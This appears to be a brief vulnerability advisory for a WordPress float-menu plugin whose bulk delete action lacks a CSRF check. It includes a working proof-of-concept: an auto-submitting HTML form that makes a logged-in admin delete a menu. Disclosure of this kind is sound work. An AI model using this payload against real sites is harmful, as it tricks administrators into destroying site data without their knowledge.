Description The plugin does not have CSRF check in its bulk actions, which could allow attackers to make logged in admin delete arbitrary menu via a CSRF attack.
Make a logged in admin open one a page with the code below, this will make them delete the menu with ID 1:
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=float-menu&action=delete-items&action2=delete-items" method="POST">
<input type="text" name="ID" value="1"/>
<input type="submit" value="submit">
</form>
</body>